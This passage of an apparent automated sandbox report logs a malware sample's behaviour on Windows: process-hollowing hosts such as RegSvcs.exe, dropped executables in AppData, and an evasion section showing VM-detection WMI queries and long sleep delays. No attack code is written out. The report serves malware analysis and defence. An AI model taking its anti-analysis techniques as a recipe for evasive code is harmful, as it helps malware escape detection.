                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: oBMlky3Rkm7h5QK.exe PID: 3544, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ECXXCuFHUVw.exe PID: 2136, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeMemory allocated: 1060000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeMemory allocated: 2DD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeMemory allocated: 4DD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeMemory allocated: 7BF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeMemory allocated: 8BF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeMemory allocated: 8DA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeMemory allocated: 9DA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeMemory allocated: 1530000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeMemory allocated: 33B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeMemory allocated: 31E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeMemory allocated: 7BC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeMemory allocated: 8BC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeMemory allocated: 7BC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeMemory allocated: CF0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeMemory allocated: 2A00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeMemory allocated: 2840000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeMemory allocated: 1060000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeMemory allocated: 2A60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeMemory allocated: 4A60000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8194Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 901Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7746Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1072Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3220Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1450Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8038
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1813
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe TID: 2752Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5896Thread sleep count: 8194 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6084Thread sleep count: 901 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2448Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3416Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2544Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1668Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exe TID: 3800Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exe TID: 5536Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exe TID: 5092Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99544Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99432Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98998Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98641Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98532Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98407Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98282Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98172Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97688Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97563Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97441Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97325Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99339
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99124
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99014
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98885
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98546
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98218
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97671
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97452
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97344
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96545
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96103
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95999
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95670
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95560
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95343
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95234
